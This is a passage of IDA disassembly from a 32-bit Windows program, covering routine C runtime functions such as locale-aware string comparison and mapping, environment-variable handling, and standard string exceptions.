or [ebp+var_4], 0FFFFFFFFh
jmp short loc_422422
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_422422: ; CODE XREF: sub_4221EA+224�j
cmp edi, ebx
jz short loc_422453
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
call ds:dword_424070 ;; MultiByteToWideChar
test eax, eax
jz short loc_422453
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424008 ;; CompareStringW
jmp short loc_422455
; ---------------------------------------------------------------------------
loc_422453: ; CODE XREF: sub_4221EA+63�j
; sub_4221EA+C6�j ...
xor eax, eax
loc_422455: ; CODE XREF: sub_4221EA+BF�j
; sub_4221EA+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4221EA endp
; =============== S U B R O U T I N E =======================================
sub_422467 proc near ; CODE XREF: sub_41E709+81�p
; sub_4221EA+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_422484
loc_422477: ; CODE XREF: sub_422467+1B�j
cmp byte ptr [eax], 0
jz short loc_422484
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_422477
loc_422484: ; CODE XREF: sub_422467+E�j
; sub_422467+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_42248F
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_42248F: ; CODE XREF: sub_422467+21�j
mov eax, edx
retn
sub_422467 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422492 proc near ; CODE XREF: sub_42217C+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_4224F6
push 3Dh
push [ebp+arg_0]
call sub_4226D8
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_4224F6
cmp [ebp+arg_0], esi
jz short loc_4224F6
mov eax, ds:dword_4CD9DC
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, ds:dword_4CD9E0
jnz short loc_4224DC
push eax
call sub_422671
pop ecx
mov ds:dword_4CD9DC, eax
loc_4224DC: ; CODE XREF: sub_422492+3C�j
cmp eax, edi
jnz short loc_422534
cmp [ebp+arg_4], edi
jz short loc_4224FE
cmp ds:dword_4CD9E4, edi
jz short loc_4224FE
call sub_42217C
test eax, eax
jz short loc_422534
loc_4224F6: ; CODE XREF: sub_422492+D�j
; sub_422492+22�j ...
or eax, 0FFFFFFFFh
loc_4224F9: ; CODE XREF: sub_422492+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4224FE: ; CODE XREF: sub_422492+51�j
; sub_422492+59�j
cmp ebx, edi
jnz loc_422612
push 4
call sub_417B89
cmp eax, edi
pop ecx
mov ds:dword_4CD9DC, eax
jz short loc_4224F6
mov [eax], edi
cmp ds:dword_4CD9E4, edi
jnz short loc_422534
push 4
call sub_417B89
cmp eax, edi
pop ecx
mov ds:dword_4CD9E4, eax
jz short loc_4224F6
mov [eax], edi
loc_422534: ; CODE XREF: sub_422492+4C�j
; sub_422492+62�j ...
sub esi, [ebp+arg_0]
mov edi, ds:dword_4CD9DC
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_422619
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_422594
cmp dword ptr [edi], 0
jz short loc_422594
test ebx, ebx
jz short loc_42258C
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_417C3B
pop ecx
loc_422566: ; CODE XREF: sub_422492+E2�j
cmp dword ptr [edi], 0
jz short loc_422576
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_422566
; ---------------------------------------------------------------------------
loc_422576: ; CODE XREF: sub_422492+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_41944F
pop ecx
test eax, eax
pop ecx
jz short loc_4225C6
jmp short loc_4225C1
; ---------------------------------------------------------------------------
loc_42258C: ; CODE XREF: sub_422492+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_4225C6
; ---------------------------------------------------------------------------
loc_422594: ; CODE XREF: sub_422492+BD�j
; sub_422492+C2�j
test ebx, ebx
jnz short loc_422612
test esi, esi
jge short loc_42259E
neg esi
loc_42259E: ; CODE XREF: sub_422492+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_41944F
pop ecx
test eax, eax
pop ecx
jz loc_4224F6
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_4225C1: ; CODE XREF: sub_422492+F8�j
mov ds:dword_4CD9DC, eax
loc_4225C6: ; CODE XREF: sub_422492+F6�j
; sub_422492+100�j
cmp [ebp+arg_4], 0
jz short loc_422612
push [ebp+arg_0]
call sub_417AB0
inc eax
inc eax
push eax
call sub_417B89
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_422612
push [ebp+arg_0]
push esi
call sub_4179C0
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call ds:dword_424004 ;; SetEnvironmentVariableA
push esi
call sub_417C3B
pop ecx
loc_422612: ; CODE XREF: sub_422492+6E�j
; sub_422492+104�j ...
xor eax, eax
jmp loc_4224F9
sub_422492 endp
; =============== S U B R O U T I N E =======================================
sub_422619 proc near ; CODE XREF: sub_422492+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ds:dword_4CD9DC
push edi
mov eax, [esi]
test eax, eax
jz short loc_422654
mov edi, [esp+8+arg_4]
loc_42262B: ; CODE XREF: sub_422619+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_42213D
add esp, 0Ch
test eax, eax
jnz short loc_42264A
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_422664
test al, al
jz short loc_422664
loc_42264A: ; CODE XREF: sub_422619+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_42262B
loc_422654: ; CODE XREF: sub_422619+C�j
mov eax, esi
sub eax, ds:dword_4CD9DC
sar eax, 2
neg eax
loc_422661: ; CODE XREF: sub_422619+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_422664: ; CODE XREF: sub_422619+2B�j
; sub_422619+2F�j
mov eax, esi
sub eax, ds:dword_4CD9DC
sar eax, 2
jmp short loc_422661
sub_422619 endp
; =============== S U B R O U T I N E =======================================
sub_422671 proc near ; CODE XREF: sub_422492+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_422680
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_422680: ; CODE XREF: sub_422671+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_422692
loc_422688: ; CODE XREF: sub_422671+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_422688
loc_422692: ; CODE XREF: sub_422671+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_417B89
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_4226B3
push 9
call sub_419CDA
pop ecx
loc_4226B3: ; CODE XREF: sub_422671+38�j
mov eax, [edi]
mov ebx, edi
loc_4226B7: ; CODE XREF: sub_422671+5B�j
test eax, eax
jz short loc_4226CE
push eax
add ebx, 4
call sub_42274B
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_4226B7
; ---------------------------------------------------------------------------
loc_4226CE: ; CODE XREF: sub_422671+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_422671 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4226D8 proc near ; CODE XREF: sub_422492+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp ds:dword_4CEDFC, 0
jnz short loc_4226F3
push [ebp+arg_4]
push [ebp+arg_0]
call sub_418F50
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4226F3: ; CODE XREF: sub_4226D8+A�j
mov ecx, [ebp+arg_0]
loc_4226F6: ; CODE XREF: sub_4226D8+56�j
movzx ax, byte ptr [ecx]
test ax, ax
jz short loc_422739
movzx edx, al
test ds:byte_4CEF01[edx], 4
jz short loc_422725
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_422730
movzx eax, ax
movzx edx, dl
shl eax, 8
or eax, edx
cmp [ebp+arg_4], eax
jz short loc_422734
jmp short loc_42272D
; ---------------------------------------------------------------------------
loc_422725: ; CODE XREF: sub_4226D8+31�j
movzx edx, ax
cmp [ebp+arg_4], edx
jz short loc_422739
loc_42272D: ; CODE XREF: sub_4226D8+4B�j
inc ecx
jmp short loc_4226F6
; ---------------------------------------------------------------------------
loc_422730: ; CODE XREF: sub_4226D8+39�j
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_422734: ; CODE XREF: sub_4226D8+49�j
lea eax, [ecx-1]
pop ebp
retn
; ---------------------------------------------------------------------------
loc_422739: ; CODE XREF: sub_4226D8+25�j
; sub_4226D8+53�j
movzx edx, ax
mov eax, [ebp+arg_4]
sub eax, edx
neg eax
sbb eax, eax
not eax
and eax, ecx
pop ebp
retn
sub_4226D8 endp
; =============== S U B R O U T I N E =======================================
sub_42274B proc near ; CODE XREF: sub_40A7D7+21�p
; sub_422671+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_422772
push esi
call sub_417AB0
inc eax
push eax
call sub_417B89
pop ecx
test eax, eax
pop ecx
jz short loc_422772
push esi
push eax
call sub_4179C0
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_422772: ; CODE XREF: sub_42274B+7�j
; sub_42274B+1A�j
xor eax, eax
pop esi
retn
sub_42274B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_422780 proc near ; CODE XREF: sub_422863+19�p
; sub_42298A+19�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
xor eax, eax
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call sub_417AB0
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_4046A3
mov eax, esi
pop esi
retn 8
sub_422780 endp
; =============== S U B R O U T I N E =======================================
sub_4227AA proc near ; CODE XREF: _0:004227D5�p
; sub_422858+6�j ...
push esi
mov esi, ecx
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_424CA4
call sub_404667
mov ecx, esi
pop esi
jmp sub_422BA6
sub_4227AA endp
; =============== S U B R O U T I N E =======================================
sub_4227C5 proc near ; DATA XREF: _1:00424CA8�o _1:00424CB8�o ...
mov eax, [ecx+10h]
test eax, eax
jnz short locret_4227D1
mov eax, offset dword_424290
locret_4227D1: ; CODE XREF: sub_4227C5+5�j
retn
sub_4227C5 endp
; ---------------------------------------------------------------------------
loc_4227D2: ; DATA XREF: _1:off_424CA4�o
push esi
mov esi, ecx
call sub_4227AA
test byte ptr [esp+8], 1
jz short loc_4227E8
push esi
call sub_4182AF
pop ecx
loc_4227E8: ; CODE XREF: _0:004227DF�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4227EE proc near ; CODE XREF: sub_422863+29�p
mov eax, offset loc_423122
call sub_418290
push ecx
push ecx
push esi
lea eax, [ebp-10h]
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset dword_424CC0
call sub_422B1F
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_424CA4
call sub_4228A0
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_424CB4
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4227EE endp
; =============== S U B R O U T I N E =======================================
sub_42283C proc near ; DATA XREF: _1:off_424CB4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_422858
test [esp+4+arg_0], 1
jz short loc_422852
push esi
call sub_4182AF
pop ecx
loc_422852: ; CODE XREF: sub_42283C+D�j
mov eax, esi
pop esi
retn 4
sub_42283C endp
; =============== S U B R O U T I N E =======================================
sub_422858 proc near ; CODE XREF: sub_42283C+3�p
; DATA XREF: _1:0042502C�o
mov dword ptr [ecx], offset off_424CB4
jmp sub_4227AA
sub_422858 endp
; =============== S U B R O U T I N E =======================================
sub_422863 proc near ; CODE XREF: sub_404514+13�p
; sub_4046D8+E�p
mov eax, offset loc_423134
call sub_418290
sub esp, 30h
lea eax, [ebp-0Dh]
push eax
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp-20h]
call sub_422780
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_4227EE
push offset dword_425028
lea eax, [ebp-3Ch]
push eax
call sub_422BC9
int 3 ; Trap to Debugger
sub_422863 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4228A0 proc near ; CODE XREF: sub_4227EE+32�p
; sub_4228C0+32�p ...
arg_0 = dword ptr 4
push esi
xor eax, eax
push 0FFFFFFFFh
mov esi, ecx
push eax
push [esp+0Ch+arg_0]
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call sub_404514
mov eax, esi
pop esi
retn 4
sub_4228A0 endp
; =============== S U B R O U T I N E =======================================
sub_4228C0 proc near ; CODE XREF: sub_42298A+29�p
mov eax, offset loc_423146
call sub_418290
push ecx
push ecx
push esi
lea eax, [ebp-10h]
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset dword_424CC0
call sub_422B1F
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_424CA4
call sub_4228A0
mov ecx, [ebp-0Ch]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4228C0 endp
; =============== S U B R O U T I N E =======================================
sub_422908 proc near ; CODE XREF: sub_422972+7�p
; sub_4229CE+7�p ...
mov eax, offset loc_423158
call sub_418290
push ecx
push esi
push edi
mov edi, [ebp+8]
mov esi, ecx
push edi
mov [ebp-10h], esi
call sub_422B5C
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_424CA4
call sub_4228A0
mov ecx, [ebp-0Ch]
pop edi
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_422908 endp
; =============== S U B R O U T I N E =======================================
sub_42294B proc near ; DATA XREF: _1:off_424CE0�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_422967
test [esp+4+arg_0], 1
jz short loc_422961
push esi
call sub_4182AF
pop ecx
loc_422961: ; CODE XREF: sub_42294B+D�j
mov eax, esi
pop esi
retn 4
sub_42294B endp
; =============== S U B R O U T I N E =======================================
sub_422967 proc near ; CODE XREF: sub_42294B+3�p
; DATA XREF: _1:004250D4�o
mov dword ptr [ecx], offset off_424CE0
jmp sub_4227AA
sub_422967 endp
; =============== S U B R O U T I N E =======================================
sub_422972 proc near ; CODE XREF: sub_4229E6+46�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_422908
mov dword ptr [esi], offset off_424CB4
mov eax, esi
pop esi
retn 4
sub_422972 endp
; =============== S U B R O U T I N E =======================================
sub_42298A proc near ; CODE XREF: sub_404464+15�p
; sub_4044BD+15�p ...
mov eax, offset loc_42316A
call sub_418290
sub esp, 30h
lea eax, [ebp-0Dh]
push eax
push offset aStringTooLong ; "string too long"
lea ecx, [ebp-20h]
call sub_422780
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_4228C0
push offset dword_4250D0
lea eax, [ebp-3Ch]
push eax
mov dword ptr [ebp-3Ch], offset off_424CE0
call sub_422BC9
int 3 ; Trap to Debugger
sub_42298A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4229CE proc near ; CODE XREF: sub_4229E6+28�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_422908
mov dword ptr [esi], offset off_424CE0
mov eax, esi
pop esi
retn 4
sub_4229CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4229E6 proc near ; DATA XREF: _1:00424CAC�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_422908
push offset dword_425110
lea eax, [ebp+var_1C]
push eax
call sub_422BC9
int 3 ; Trap to Debugger
loc_422A04: ; DATA XREF: _1:00424CE8�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_4229CE
push offset dword_4250D0
lea eax, [ebp+var_1C]
push eax
call sub_422BC9
int 3 ; Trap to Debugger
loc_422A22: ; DATA XREF: _1:00424CBC�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_422972
push offset dword_425028
lea eax, [ebp+var_1C]
push eax
call sub_422BC9
int 3 ; Trap to Debugger
sub_4229E6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_422A40 proc near ; CODE XREF: sub_40494F+6C�p
jmp ds:dword_4241D8
sub_422A40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_422A46 proc near ; CODE XREF: sub_403DF6+5E�p
; sub_4053D5+159�p
jmp ds:dword_424210
sub_422A46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_422A4C proc near ; CODE XREF: sub_417EFC+23�p
; sub_4181A0+13�p
jmp ds:dword_424188
sub_422A4C endp
; =============== S U B R O U T I N E =======================================
sub_422A52 proc near ; CODE XREF: sub_409392+E2�p
; sub_409392+F9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp ds:dword_4CDA48, 0
push ebx
jnz short loc_422A98
mov edx, [esp+4+arg_4]
mov ecx, [esp+4+arg_0]
loc_422A64: ; CODE XREF: sub_422A52+42�j
mov bx, [ecx]
cmp bx, 5Ah
ja short loc_422A76
cmp bx, 41h
jb short loc_422A76
add ebx, 20h
loc_422A76: ; CODE XREF: sub_422A52+19�j
; sub_422A52+1F�j
mov ax, [edx]
cmp ax, 5Ah
ja short loc_422A88
cmp ax, 41h
jb short loc_422A88
add eax, 20h
loc_422A88: ; CODE XREF: sub_422A52+2B�j
; sub_422A52+31�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_422AC8
cmp bx, ax
jz short loc_422A64
jmp short loc_422AC8
; ---------------------------------------------------------------------------
loc_422A98: ; CODE XREF: sub_422A52+8�j
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, [esp+0Ch+arg_4]
loc_422AA2: ; CODE XREF: sub_422A52+72�j
mov ax, [esi]
inc esi
push eax
inc esi
call sub_422C03
mov ebx, eax
mov ax, [edi]
inc edi
push eax
inc edi
call sub_422C03
pop ecx
test bx, bx
pop ecx
jz short loc_422AC6
cmp bx, ax
jz short loc_422AA2
loc_422AC6: ; CODE XREF: sub_422A52+6D�j
pop edi
pop esi
loc_422AC8: ; CODE XREF: sub_422A52+3D�j
; sub_422A52+44�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
retn
sub_422A52 endp
; =============== S U B R O U T I N E =======================================
sub_422AD2 proc near ; CODE XREF: _0:00422AEA�p
mov dword ptr [ecx], offset off_424D00
mov ecx, [ecx+4]
test ecx, ecx
jz short locret_422AE6
push ecx
call sub_417C3B
pop ecx
locret_422AE6: ; CODE XREF: sub_422AD2+B�j
retn
sub_422AD2 endp
; ---------------------------------------------------------------------------
loc_422AE7: ; DATA XREF: _1:off_424D00�o
push esi
mov esi, ecx
call sub_422AD2
test byte ptr [esp+8], 1
jz short loc_422AFD
push esi
call sub_4182AF
pop ecx
loc_422AFD: ; CODE XREF: _0:00422AF4�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_422B03: ; DATA XREF: _1:off_424D08�o
push esi
mov esi, ecx
call sub_422BA6
test byte ptr [esp+8], 1
jz short loc_422B19
push esi
call sub_4182AF
pop ecx
loc_422B19: ; CODE XREF: _0:00422B10�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_422B1F proc near ; CODE XREF: sub_4227EE+1D�p
; sub_4228C0+1D�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_424D08
push dword ptr [edi]
call sub_417AB0
inc eax
push eax
call sub_4185F5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_422B4E
push dword ptr [edi]
push eax
call sub_4179C0
pop ecx
pop ecx
loc_422B4E: ; CODE XREF: sub_422B1F+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_422B1F endp
; =============== S U B R O U T I N E =======================================
sub_422B5C proc near ; CODE XREF: sub_422908+16�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_424D08
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_422B99
push dword ptr [edi+4]
call sub_417AB0
inc eax
push eax
call sub_4185F5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_422B9F
push dword ptr [edi+4]
push eax
call sub_4179C0
pop ecx
pop ecx
jmp short loc_422B9F
; ---------------------------------------------------------------------------
loc_422B99: ; CODE XREF: sub_422B5C+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_422B9F: ; CODE XREF: sub_422B5C+2E�j
; sub_422B5C+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_422B5C endp
; =============== S U B R O U T I N E =======================================
sub_422BA6 proc near ; CODE XREF: sub_4227AA+16�j
; _0:00422B06�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_424D08
jz short locret_422BBB
push dword ptr [ecx+4]
call sub_4182AF
pop ecx
locret_422BBB: ; CODE XREF: sub_422BA6+A�j
retn
sub_422BA6 endp
; =============== S U B R O U T I N E =======================================
sub_422BBC proc near ; DATA XREF: _1:00424D0C�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_422BC8
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_422BC8: ; CODE XREF: sub_422BBC+5�j
retn
sub_422BBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422BC9 proc near ; CODE XREF: sub_422863+37�p
; sub_42298A+3E�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_424D28
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:dword_4241BC ;; RaiseException
pop edi
pop esi
leave
retn 8
sub_422BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422C03 proc near ; CODE XREF: sub_422A52+56�p
; sub_422A52+63�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp ax, 0FFFFh
jnz short loc_422C15
or ax, ax
leave
retn
; ---------------------------------------------------------------------------
loc_422C15: ; CODE XREF: sub_422C03+B�j
cmp ds:dword_4CDA48, 0
jnz short loc_422C2F
cmp ax, 41h
jb short locret_422C76
cmp ax, 5Ah
ja short locret_422C76
add eax, 20h
leave
retn
; ---------------------------------------------------------------------------
loc_422C2F: ; CODE XREF: sub_422C03+19�j
cmp ax, 100h
jnb short loc_422C49
push 1
push eax
call sub_422EB1
pop ecx
test eax, eax
pop ecx
jnz short loc_422C49
mov ax, word ptr [ebp+arg_0]
leave
retn
; ---------------------------------------------------------------------------
loc_422C49: ; CODE XREF: sub_422C03+30�j
; sub_422C03+3E�j
push 0
lea eax, [ebp+var_2]
push 1
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 100h
push ds:dword_4CDA48
call sub_422C78
add esp, 1Ch
test eax, eax
mov ax, word ptr [ebp+arg_0]
jz short locret_422C76
mov ax, [ebp+var_2]
locret_422C76: ; CODE XREF: sub_422C03+1F�j
; sub_422C03+25�j ...
leave
retn
sub_422C03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422C78 proc near ; CODE XREF: sub_422C03+5F�p
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424D48
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
cmp ds:dword_4CDCA4, esi
jnz short loc_422CEE
push esi
push esi
push 1
pop ebx
push ebx
push offset dword_4248D8
mov edi, 100h
push edi
push esi
call ds:dword_4241C8 ;; LCMapStringW
test eax, eax
jz short loc_422CCC
mov ds:dword_4CDCA4, ebx
jmp short loc_422CEE
; ---------------------------------------------------------------------------
loc_422CCC: ; CODE XREF: sub_422C78+4A�j
push esi
push esi
push ebx
push offset dword_436EF4
push edi
push esi
call ds:dword_4241C4 ;; LCMapStringA
test eax, eax
jz loc_422E6D
mov ds:dword_4CDCA4, 2
loc_422CEE: ; CODE XREF: sub_422C78+2E�j
; sub_422C78+52�j
cmp [ebp+arg_C], esi
jle short loc_422D03
push [ebp+arg_C]
push [ebp+arg_8]
call sub_422E81
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_422D03: ; CODE XREF: sub_422C78+79�j
mov eax, ds:dword_4CDCA4
cmp eax, 1
jnz short loc_422D2A
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C8 ;; LCMapStringW
jmp loc_422E6F
; ---------------------------------------------------------------------------
loc_422D2A: ; CODE XREF: sub_422C78+93�j
cmp eax, 2
jnz loc_422E6D
cmp [ebp+arg_18], esi
jnz short loc_422D40
mov eax, ds:dword_4CDA58
mov [ebp+arg_18], eax
loc_422D40: ; CODE XREF: sub_422C78+BE�j
push esi
push esi
push esi
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
call ds:dword_424150 ;; WideCharToMultiByte
mov [ebp+var_20], eax
cmp eax, esi
jz loc_422E6D
mov [ebp+var_4], esi
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_1C], eax
jmp short loc_422D86
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
mov [ebp+var_1C], esi
loc_422D86: ; CODE XREF: sub_422C78+100�j
or [ebp+var_4], 0FFFFFFFFh
cmp [ebp+var_1C], esi
jz loc_422E6D
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
call ds:dword_424150 ;; WideCharToMultiByte
test eax, eax
jz loc_422E6D
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C4 ;; LCMapStringA
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, esi
jz loc_422E6D
mov [ebp+var_4], 1
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_422E09
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+var_2C]
loc_422E09: ; CODE XREF: sub_422C78+17D�j
cmp ebx, esi
jz short loc_422E6D
push edi
push ebx
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C4 ;; LCMapStringA
test eax, eax
jz short loc_422E6D
test byte ptr [ebp+arg_4+1], 4
